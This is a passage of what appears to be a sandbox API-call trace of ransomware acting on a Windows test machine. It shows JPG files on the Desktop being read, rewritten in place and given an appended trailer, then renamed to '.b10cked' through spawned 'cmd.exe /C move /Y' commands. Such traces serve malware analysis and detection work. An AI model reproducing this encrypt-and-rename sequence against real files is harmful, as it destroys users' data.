dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x12152 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.602] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12152 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.603] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x11c6a [0138.603] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x12152 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x12152 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.604] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.605] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x90a8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x90a8, lpOverlapped=0x0) returned 1 [0138.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.605] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x90a8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x90a8, lpOverlapped=0x0) returned 1 [0138.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=-37032, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x90aa [0138.605] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x90a8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x90a8, lpOverlapped=0x0) returned 1 [0138.605] SetFilePointer (in: hFile=0x114, lDistanceToMove=-37032, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x90aa [0138.606] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x90a8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x90a8, lpOverlapped=0x0) returned 1 [0138.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bkwVSdvUcmd7uNf_5 x.jpg", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0138.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bkwVSdvUcmd7uNf_5 x.jpg", cchWideChar=23, lpMultiByteStr=0x1328834, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bkwVSdvUcmd7uNf_5 x.jpg", lpUsedDefaultChar=0x0) returned 23 [0138.609] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x12152 [0138.609] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.610] CloseHandle (hObject=0x114) returned 1 [0138.611] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG") returned 0x25 [0138.611] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0138.611] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BKWVSD~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\bkwVSdvUcmd7uNf_5 x.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xeb8, dwThreadId=0xe74)) returned 1 [0138.783] CloseHandle (hObject=0x110) returned 1 [0138.783] CloseHandle (hObject=0x114) returned 1 [0138.783] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.783] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0138.783] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount2=41) returned 1 [0138.783] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.783] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.783] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0138.783] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.783] ReleaseMutex (hMutex=0xf8) returned 1 [0138.783] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.783] ReleaseMutex (hMutex=0xf8) returned 1 [0138.783] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.783] ReleaseMutex (hMutex=0xf8) returned 1 [0138.783] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.784] ReleaseMutex (hMutex=0xf8) returned 1 [0138.784] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\4_irbu3smzgt2kgk_co7.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19557311664) returned 1 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xc483 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.784] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc483 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.785] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xbf9b [0138.785] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xc483 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xc483 [0138.786] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.787] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.787] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6240, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6240, lpOverlapped=0x0) returned 1 [0138.787] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.787] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6240, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6240, lpOverlapped=0x0) returned 1 [0138.787] SetFilePointer (in: hFile=0x114, lDistanceToMove=-25152, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6243 [0138.787] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6240, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6240, lpOverlapped=0x0) returned 1 [0138.787] SetFilePointer (in: hFile=0x114, lDistanceToMove=-25152, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6243 [0138.787] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6240, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6240, lpOverlapped=0x0) returned 1 [0138.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4_Irbu3SMZgt2KGk_cO7.jpg", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0138.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4_Irbu3SMZgt2KGk_cO7.jpg", cchWideChar=24, lpMultiByteStr=0x132f63c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4_Irbu3SMZgt2KGk_cO7.jpg", lpUsedDefaultChar=0x0) returned 24 [0138.791] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xc483 [0138.792] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.792] CloseHandle (hObject=0x114) returned 1 [0138.809] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG") returned 0x39 [0138.810] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\") returned 0x2d [0138.810] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_IRBU~1.JPG\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\4_Irbu3SMZgt2KGk_cO7.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xea0, dwThreadId=0xe9c)) returned 1 [0138.837] CloseHandle (hObject=0x110) returned 1 [0138.837] CloseHandle (hObject=0x114) returned 1 [0138.837] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", cchLength=0x2d | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0138.837] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0138.837] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount1=45, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount2=41) returned 1 [0138.837] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", cchLength=0x2d | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0138.837] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: 